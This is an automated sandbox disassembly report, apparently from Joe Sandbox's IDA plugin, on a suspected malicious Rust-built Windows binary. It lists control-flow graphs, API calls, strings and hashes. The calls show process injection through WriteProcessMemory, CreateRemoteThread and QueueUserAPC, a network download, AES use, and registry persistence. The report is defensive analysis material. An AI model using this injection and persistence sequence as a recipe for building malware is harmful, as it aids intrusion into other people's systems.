2ac481 memcpy 36087->36089 36088->36082 36158 29a0a0 44 API calls 36088->36158 36089->36082 36100->36061 36101->36064 36102->36044 36106 2ab70a 36105->36106 36118 2ab741 36105->36118 36107 2ab72b GetLastError 36106->36107 36108 2ab75f 36106->36108 36106->36118 36107->36118 36109 2ab783 36108->36109 36112 2ab7cf 36108->36112 36116 2ab841 36108->36116 36110 2ab78c 36109->36110 36111 2ab960 36109->36111 36110->36118 36121 2ab9cc 36110->36121 36126 2ab8d7 36110->36126 36113 299650 37 API calls 36111->36113 36114 2ab992 36112->36114 36115 2ab832 36112->36115 36113->36114 36117 2ab230 37 API calls 36114->36117 36115->36118 36120 2abaa0 37 API calls 36115->36120 36116->36115 36116->36118 36122 2ab87a 36116->36122 36123 2ab9f9 36116->36123 36117->36121 36118->36076 36119 29a0a0 37 API calls 36119->36123 36120->36118 36121->36119 36122->36115 36125 2aba0e 36122->36125 36124 29a0a0 37 API calls 36123->36124 36124->36125 36129 29b530 37 API calls 36125->36129 36126->36118 36127 2aba3e 36126->36127 36128 2ab902 36126->36128 36131 2abd10 37 API calls 36127->36131 36130 2abaa0 37 API calls 36128->36130 36129->36127 36132 2ab90d 36130->36132 36131->36132 36132->36118 36133 2abd10 37 API calls 36132->36133 36134 2aba7e CloseHandle 36133->36134 36135 2d28b0 6 API calls 36134->36135 36146 2aba91 36135->36146 36136 2abb16 MultiByteToWideChar 36137 2abc79 36136->36137 36138 2abb41 36136->36138 36139 299650 37 API calls 36137->36139 36140 2abcba 36138->36140 36141 2abb4f WriteConsoleW 36138->36141 36139->36140 36144 29a0a0 37 API calls 36140->36144 36142 2abc4e GetLastError 36141->36142 36143 2abb80 36141->36143 36154 2abbf1 36142->36154 36147 2abce8 36143->36147 36148 2abb95 36143->36148 36143->36154 36145 2abcce 36144->36145 36149 29c3a0 37 API calls 36145->36149 36146->36136 36146->36145 36152 299700 37 API calls 36147->36152 36150 2abbe8 36148->36150 36151 2abba9 WriteConsoleW 36148->36151 36149->36147 36150->36154 36155 29a0a0 37 API calls 36150->36155 36151->36150 36153 2abbe3 GetLastError 36151->36153 36152->36150 36153->36150 36154->36076 36156 2abd0c 36155->36156 36160->35855 36163->35868 36165->35880 36167->35894 36171->35931 36173->35941
                APIs
                  • Part of subcall function 002A1956: TlsGetValue.KERNEL32 ref: 002A1977
                  • Part of subcall function 002A1956: memset.MSVCRT ref: 002A1A3F
                  • Part of subcall function 002A1956: TlsGetValue.KERNEL32 ref: 002A1AB4
                  • Part of subcall function 002A1956: TlsSetValue.KERNEL32 ref: 002A1AC1
                • LoadLibraryA.KERNELBASE ref: 00294F09
                • LoadLibraryA.KERNELBASE ref: 00294F3A
                • CreateProcessA.KERNELBASE ref: 0029523D
                  • Part of subcall function 002CF130: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 002CF28F
                • VirtualAllocEx.KERNELBASE ref: 00295430
                • WriteProcessMemory.KERNELBASE ref: 002954EE
                  • Part of subcall function 002948C3: strlen.MSVCRT ref: 0029490A
                • CreateRemoteThread.KERNELBASE ref: 002956B8
                • VirtualProtectEx.KERNELBASE ref: 002958F8
                • WriteProcessMemory.KERNELBASE ref: 00295929
                • VirtualProtectEx.KERNELBASE ref: 00295A2F
                • VirtualProtectEx.KERNELBASE ref: 00295C01
                • WriteProcessMemory.KERNELBASE ref: 00295C2F
                • VirtualProtectEx.KERNELBASE ref: 00295D30
                • memset.MSVCRT ref: 00295E42
                • InternetOpenA.WININET ref: 00295E9B
                • InternetOpenUrlA.WININET ref: 00295EF2
                • InternetReadFile.WININET ref: 00295F23
                  • Part of subcall function 00293444: memcpy.MSVCRT ref: 00293472
                • memset.MSVCRT ref: 00296962
                • memcpy.MSVCRT ref: 00296A25
                • memcpy.MSVCRT ref: 00296A64
                • memcpy.MSVCRT ref: 00296B2A
                • memcpy.MSVCRT ref: 00296E2B
                • memcpy.MSVCRT ref: 00296E6A
                • memcpy.MSVCRT ref: 00296F30
                • memset.MSVCRT ref: 00296FC8
                • VirtualAllocEx.KERNELBASE ref: 00297142
                • WriteProcessMemory.KERNELBASE ref: 002971A6
                • QueueUserAPC.KERNELBASE ref: 002971C2
                • ResumeThread.KERNELBASE ref: 002971E1
                • SetLastError.KERNEL32 ref: 0029733E
                • GetModuleFileNameW.KERNEL32 ref: 0029734B
                • GetLastError.KERNEL32 ref: 00297356
                • GetLastError.KERNEL32 ref: 0029736B
                • CopyFileExW.KERNEL32 ref: 00297D37
                • RegCreateKeyExA.KERNELBASE ref: 00297DC6
                • RegSetValueExA.KERNELBASE ref: 00297F12
                • GetLastError.KERNEL32 ref: 00298111
                • GetLastError.KERNEL32 ref: 00298627
                Strings
                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 00294B00
                • @, xrefs: 0029712F
                • HANDLE:\, xrefs: 0029874A
                • .-), xrefs: 0029815C
                • Invalid AES key size., xrefs: 002985F9
                • E,), xrefs: 00296B74
                • appdata, xrefs: 00297443
                • AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs, xrefs: 00298596
                • [86!6f3', xrefs: 0029551A
                • called `Result::unwrap()` on an `Err` value, xrefs: 002980B1, 00298155, 002983B2, 002983E7, 00298571, 002985BA
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: memcpy$Virtual$ErrorLastProcess$MemoryProtectValueWritememset$CreateFileInternet$AllocLibraryLoadOpenThread$AddressCopyModuleNameQueueReadRemoteResumeSingleUserWakestrlen
                • String ID: .-)$@$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs$E,)$HANDLE:\$Invalid AES key size.$[86!6f3'$appdata$called `Result::unwrap()` on an `Err` value
                • API String ID: 1461981717-75148481
                • Opcode ID: 260120ef1be00b7aa491d3818069dd46dda74135e0f30d9b32fbaf2a3bd3d5e5
                • Instruction ID: 4661590946ae4ab177cb1108bbc7ce0e2494ba96198bf6491d37b843fa72d02f
                • Opcode Fuzzy Hash: 260120ef1be00b7aa491d3818069dd46dda74135e0f30d9b32fbaf2a3bd3d5e5
                • Instruction Fuzzy Hash: 69638E72228BC181EB20DB25E4547EAB364F785B84F848616DECD07B59DF78C66ACB40

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 913 2ab6f0-2ab708 914 2ab70a-2ab723 call 2d23f4 913->914 915 2ab741-2ab745 913->915 919 2ab747 914->919 920 2ab725-2ab729 914->920 917 2ab751-2ab75e 915->917 919->917 921 2ab72b-2ab73f GetLastError 920->921 922 2ab75f-2ab774 call 2d2464 920->922 921->917 925 2ab7cf-2ab815 call 2d24d4 922->925 926 2ab776-2ab77d 922->926 934 2ab832-2ab834 925->934 935 2ab817-2ab82c call 2d234c 925->935 928 2ab783-2ab786 926->928 929 2ab841-2ab862 call 29ae30 926->929 932 2ab78c-2ab79a 928->932 933 2ab960-2ab98d call 299650 928->933 946 2ab8b6-2ab8ba 929->946 947 2ab864-2ab86b 929->947 938 2ab89a-2ab8a5 932->938 939 2ab7a0-2ab7c0 932->939 945 2ab992-2ab9e0 call 2ab230 call 2ab340 933->945 943 2ab8aa-2ab8b1 call 2d24cc 934->943 944 2ab836-2ab83c 934->944 935->934 935->945 938->917 940 2ab8cb-2ab8d1 939->940 941 2ab7c6-2ab7cd 939->941 951 2ab9e2-2ab9f4 call 29a0a0 940->951 952 2ab8d7-2ab8eb call 29ae30 940->952 941->917 943->946 944->917 945->951 950 2ab8be-2ab8c1 call 2abaa0 946->950 954 2ab931-2ab942 947->954 955 2ab871-2ab874 947->955 966 2ab8c6 950->966 964 2ab9f9-2aba09 call 29a0a0 951->964 958 2ab94f-2ab95b 952->958 972 2ab8ed-2ab8fc 952->972 954->958 959 2ab944-2ab946 954->959 963 2ab87a-2ab88a call 29ae30 955->963 955->964 958->917 959->958 971 2aba0e-2aba39 call 29b530 963->971 976 2ab890-2ab898 963->976 964->971 966->917 974 2aba3e-2aba59 call 2abd10 971->974 972->974 975 2ab902-2ab910 call 2abaa0 972->975 981 2aba5e-2abaa6 call 2abd10 CloseHandle call 2d28b0 974->981 975->917 982 2ab916-2ab921 975->982 976->950 988 2abab0-2abacb 981->988 989 2abaab call 2d2300 981->989 982->981 984 2ab927-2ab92c 982->984 984->917 990 2abacd-2abad2 988->990 991 2abb16-2abb3b MultiByteToWideChar 988->991 989->988 992 2abae0-2abaeb 990->992 993 2abc79-2abcb5 call 299650 991->993 994 2abb41-2abb49 991->994 992->992 996 2abaed-2abafe 992->996 997 2abcba-2abcc9 call 29a0a0 993->997 994->997 998 2abb4f-2abb7a WriteConsoleW 994->998 1002 2abb10 996->1002 1003 2abb00-2abb05 996->1003 1007 2abcce-2abce3 call 29c3a0 997->1007 999 2abc4e-2abc62 GetLastError 998->999 1000 2abb80-2abb89 998->1000 1006 2abc68-2abc78 999->1006 1004 2abb8f 1000->1004 1005 2abc66 1000->1005 1002->991 1002->1007 1003->1007 1008 2abb0b-2abb0e 1003->1008 1009 2abce8-2abcf5 call 299700 1004->1009 1010 2abb95-2abba7 1004->1010 1005->1006 1007->1009 1008->991 1016 2abcfa-2abd0d call 29a0a0 1009->1016 1012 2abbe8-2abbeb 1010->1012 1013 2abba9-2abbe1 WriteConsoleW 1010->1013 1012->1016 1017 2abbf1-2abbf4 1012->1017 1013->1012 1015 2abbe3 GetLastError 1013->1015 1015->1012 1018 2abbf6-2abbfd 1017->1018 1019 2abc64 1017->1019 1022 2abc0c-2abc1c 1018->1022 1019->1005 1023 2abc1e-2abc2e 1022->1023 1024 2abc00-2abc0a 1022->1024 1023->1024 1025 2abc30-2abc4c 1023->1025 1024->1005 1024->1022 1025->1024
                APIs
                • GetLastError.KERNEL32 ref: 002AB72B
                • CloseHandle.KERNEL32 ref: 002ABA84
                  • Part of subcall function 002D28B0: RtlCaptureContext.KERNEL32 ref: 002D2935
                  • Part of subcall function 002D28B0: RtlUnwindEx.KERNEL32 ref: 002D2953
                  • Part of subcall function 002D28B0: abort.MSVCRT ref: 002D2959
                  • Part of subcall function 002D28B0: abort.MSVCRT ref: 002D2970
                • MultiByteToWideChar.KERNEL32 ref: 002ABB34
                • WriteConsoleW.KERNEL32 ref: 002ABB73
                • WriteConsoleW.KERNEL32 ref: 002ABBDA
                • GetLastError.KERNEL32 ref: 002ABBE3
                • GetLastError.KERNEL32 ref: 002ABC4E
                Strings
                • called `Result::unwrap()` on an `Err` value, xrefs: 002ABA22
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ErrorLast$ConsoleWriteabort$ByteCaptureCharCloseContextHandleMultiUnwindWide
                • String ID: called `Result::unwrap()` on an `Err` value
                • API String ID: 3690811170-2333694755
                • Opcode ID: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
                • Instruction ID: 7623b12e7a87205544bd8ea4e45ca8d7a523931c10cd081e463e5c11ccc5d4ea
                • Opcode Fuzzy Hash: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
                • Instruction Fuzzy Hash: 89E123726207D18AEB22CF34D8443ED6761F746398F548222EE4907B9AEF78C6A5C300

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1026 291180-2911ae 1027 291460-291463 GetStartupInfoA 1026->1027 1028 2911b4-2911d1 1026->1028 1030 291470-29148a call 2d2be0 1027->1030 1029 2911e9-2911f4 1028->1029 1031 2911d8-2911db 1029->1031 1032 2911f6-291204 1029->1032 1034 2911e1-2911e6 Sleep 1031->1034 1035 291400-291411 1031->1035 1036 29120a-29120e 1032->1036 1037 291417-291426 call 2d2be8 1032->1037 1034->1029 1035->1036 1035->1037 1040 291490-2914a9 call 2d2bd8 1036->1040 1041 291214-291223 1036->1041 1044 291229-29122b 1037->1044 1045 29142c-291447 _initterm 1037->1045 1052 2914ae-2914b0 call 2d2bc0 1040->1052 1041->1044 1041->1045 1046 29144d-291452 1044->1046 1047 291231-29123e 1044->1047 1045->1046 1045->1047 1046->1047 1049 29124c-291299 call 2d3370 SetUnhandledExceptionFilter call 2d3880 call 2d2c10 call 2d30e0 call 2d2c20 1047->1049 1050 291240-291248 1047->1050 1068 29129b 1049->1068 1069 2912b2-2912b8 1049->1069 1050->1049 1056 2914b5-2914e1 call 2d2d30 call 291180 1052->1056 1072 2912f0-2912f6 1068->1072 1070 2912ba-2912c8 1069->1070 1071 2912a0-2912a2 1069->1071 1075 2912ae 1070->1075 1073 2912e9 1071->1073 1074 2912a4-2912a7 1071->1074 1076 2912f8-291302 1072->1076 1077 29130e-291333 malloc 1072->1077 1073->1072 1078 2912a9 1074->1078 1079 2912d0-2912d2 1074->1079 1075->1069 1080 291308 1076->1080 1081 2913f0-2913f5 1076->1081 1082 29137b-2913af call 2d2cf0 call 298820 1077->1082 1083 291335-29133a 1077->1083 1078->1075 1079->1073 1085 2912d4 1079->1085 1080->1077 1081->1080 1092 2913b4-2913c2 1082->1092 1086 291340-291374 strlen malloc memcpy 1083->1086 1089 2912d8-2912e2 1085->1089 1086->1086 1087 291376 1086->1087 1087->1082 1089->1073 1091 2912e4-2912e7 1089->1091 1091->1073 1091->1089 1092->1052 1093 2913c8-2913d0 1092->1093 1093->1030 1094 2913d6-2913e5 1093->1094
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                • String ID:
                • API String ID: 649803965-0
                • Opcode ID: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
                • Instruction ID: d7b78c4f2451c754cef4492e7b48e99a284227a600a72744cc8696316928cd24
                • Opcode Fuzzy Hash: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
                • Instruction Fuzzy Hash: F581ED32B2079685EF20AF56E89976D3361FB49B80F848027CE0943755DF79C8B4CB40

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1214 298820-29889c call 2d2cf0 call 2d24bc call 2d237c call 2d244c SetThreadDescription call 2aafc0 call 2ac630 1227 298933-298937 1214->1227 1228 2988a2-2988a6 1214->1228 1231 298939-29893d call 2aad40 1227->1231 1232 298942-29896a call 29b530 1227->1232 1229 29896c-2989be call 2ab230 call 2ab340 1228->1229 1230 2988ac-2988cb call 2ac560 1228->1230 1242 2989c0-2989d3 call 29b6f0 1229->1242 1241 2988d1-2988d6 1230->1241 1230->1242 1231->1232 1240 2989d8-2989e3 call 2ab080 1232->1240 1252 2989e5-2989f7 call 2aad40 call 2ab080 1240->1252 1253 298a07-298a0d call 2ab080 1240->1253 1244 2988d8-2988dc 1241->1244 1245 2988df-2988e6 call 2927fb 1241->1245 1242->1240 1244->1245 1251 2988eb-2988f4 1245->1251 1255 298927-298932 1251->1255 1256 2988f6-298922 call 2ab090 1251->1256 1252->1253 1263 2989f9-298a02 call 2aad40 call 2ab080 1252->1263 1256->1255 1263->1253
                APIs
                • SetThreadDescription.KERNELBASE ref: 0029886A
                  • Part of subcall function 002AC630: TlsGetValue.KERNEL32 ref: 002AC64F
                  • Part of subcall function 002AC630: TlsGetValue.KERNEL32 ref: 002AC683
                  • Part of subcall function 002AC630: TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,002AC741), ref: 002AC693
                  • Part of subcall function 002AC560: TlsGetValue.KERNEL32 ref: 002AC582
                  • Part of subcall function 002AC560: TlsGetValue.KERNEL32 ref: 002AC5D2
                  • Part of subcall function 002AC560: TlsSetValue.KERNEL32(?,?,00000000,?,002AC741), ref: 002AC5E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: Value$DescriptionThread
                • String ID: main
                • API String ID: 1014837369-3207122276
                • Opcode ID: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
                • Instruction ID: 0ef227204edea0ef4b68e802ea556b688db6f7d62ab6031591296cc1a66f6134
                • Opcode Fuzzy Hash: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
                • Instruction Fuzzy Hash: BC515832A20B54DAEB11EFA0E8443ED3374FB55308F94442AEA4D57B55EF38C96AC741

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1095 2a1956-2a196d 1096 2a1ae8-2a1af4 call 2ac7f0 1095->1096 1097 2a1973-2a1983 TlsGetValue 1095->1097 1108 2a1afb-2a1b56 call 299650 1096->1108 1098 2a1ad8-2a1ae7 1097->1098 1099 2a1989 1097->1099 1101 2a198f-2a1992 1099->1101 1102 2a1ad5 1099->1102 1104 2a19a4-2a19b6 call 2a3d17 1101->1104 1105 2a1994-2a199e 1101->1105 1102->1098 1110 2a19bb-2a19be 1104->1110 1105->1104 1106 2a1a9a-2a1ac9 call 2a0e1a TlsGetValue TlsSetValue 1105->1106 1106->1098 1115 2a1acb-2a1ad3 call 2a0de2 1106->1115 1110->1108 1113 2a19c4-2a1a92 call 2a0e49 call 2a0e1a memset 1110->1113 1113->1106 1115->1098
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: Value$memset
                • String ID: h-
                • API String ID: 3732838118-1003138898
                • Opcode ID: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
                • Instruction ID: a9e8114a03e4db3cc6367af32220c85e0fd5bc94559dea06e2e9250b2ab75a18
                • Opcode Fuzzy Hash: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
                • Instruction Fuzzy Hash: 5151D032614FC492E7198F28E6403E9B3A0FB99798F148211EF8817725EF38DAB5C740

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1122 2abaa0-2abacb call 2d2300 1125 2abacd-2abad2 1122->1125 1126 2abb16-2abb3b MultiByteToWideChar 1122->1126 1127 2abae0-2abaeb 1125->1127 1128 2abc79-2abcb5 call 299650 1126->1128 1129 2abb41-2abb49 1126->1129 1127->1127 1131 2abaed-2abafe 1127->1131 1132 2abcba-2abcc9 call 29a0a0 1128->1132 1129->1132 1133 2abb4f-2abb7a WriteConsoleW 1129->1133 1137 2abb10 1131->1137 1138 2abb00-2abb05 1131->1138 1142 2abcce-2abce3 call 29c3a0 1132->1142 1134 2abc4e-2abc62 GetLastError 1133->1134 1135 2abb80-2abb89 1133->1135 1141 2abc68-2abc78 1134->1141 1139 2abb8f 1135->1139 1140 2abc66 1135->1140 1137->1126 1137->1142 1138->1142 1143 2abb0b-2abb0e 1138->1143 1144 2abce8-2abcf5 call 299700 1139->1144 1145 2abb95-2abba7 1139->1145 1140->1141 1142->1144 1143->1126 1151 2abcfa-2abd0d call 29a0a0 1144->1151 1147 2abbe8-2abbeb 1145->1147 1148 2abba9-2abbe1 WriteConsoleW 1145->1148 1147->1151 1152 2abbf1-2abbf4 1147->1152 1148->1147 1150 2abbe3 GetLastError 1148->1150 1150->1147 1153 2abbf6-2abbfd 1152->1153 1154 2abc64 1152->1154 1157 2abc0c-2abc1c 1153->1157 1154->1140 1158 2abc1e-2abc2e 1157->1158 1159 2abc00-2abc0a 1157->1159 1158->1159 1160 2abc30-2abc4c 1158->1160 1159->1140 1159->1157 1160->1159
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                • String ID:
                • API String ID: 1956605914-0
                • Opcode ID: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
                • Instruction ID: fa2bf5305fc2d3676a0c54f9e98b4be441ecdb875634efda10c823386c55e831
                • Opcode Fuzzy Hash: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
                • Instruction Fuzzy Hash: 553135617206A14BE7364B21D844BEEA612F7167E4F004232EE8947BDEEF7CC565C700

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1161 2cf130-2cf166 1162 2cf16c-2cf17e call 2ac110 1161->1162 1163 2cf2a9-2cf2ae call 2ceaa0 1161->1163 1168 2cf180-2cf189 1162->1168 1169 2cf193-2cf19f 1162->1169 1170 2cf2b3-2cf2bf call 2afc90 1163->1170 1171 2cf18f-2cf191 1168->1171 1172 2cf323-2cf343 call 29b6f0 1168->1172 1169->1170 1173 2cf1a5-2cf1ac 1169->1173 1183 2cf2c4-2cf31c call 299650 1170->1183 1175 2cf1b1-2cf1ed call 29a740 1171->1175 1181 2cf345-2cf34c call 298a20 1172->1181 1182 2cf351-2cf39b call 298a20 call 2ac1d0 call 2d28b0 call 29b900 1172->1182 1173->1175 1184 2cf1ef-2cf1f2 1175->1184 1185 2cf22b-2cf234 1175->1185 1181->1182 1197 2cf321 1183->1197 1189 2cf1f4-2cf226 call 299650 1184->1189 1190 2cf272-2cf279 1184->1190 1191 2cf26f 1185->1191 1192 2cf236-2cf248 1185->1192 1189->1197 1198 2cf27b-2cf289 1190->1198 1199 2cf294-2cf297 1190->1199 1191->1190 1194 2cf24f-2cf254 1192->1194 1195 2cf24a 1192->1195 1202 2cf256-2cf25d call 298a20 1194->1202 1203 2cf262-2cf26a call 298a20 1194->1203 1195->1194 1197->1172 1198->1199 1204 2cf28b-2cf28f WakeByAddressSingle 1198->1204 1199->1183 1205 2cf299-2cf2a8 1199->1205 1202->1203 1203->1191 1204->1199
                APIs
                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 002CF28F
                Strings
                • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 002CF323
                • stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer, xrefs: 002CF14A
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: AddressSingleWake
                • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer
                • API String ID: 3114109732-4016646221
                • Opcode ID: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
                • Instruction ID: 476d62fd073e8bca6ea2974c7bef918bb5d47dace1a1ca4772f22761e7ae2064
                • Opcode Fuzzy Hash: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
                • Instruction Fuzzy Hash: 9651EF32721B9089EB40DF60E9887AC33B6F705398F94862ADE0D57B54DF78C5AAC341

                Control-flow Graph

                • Executed
                • Not Executed
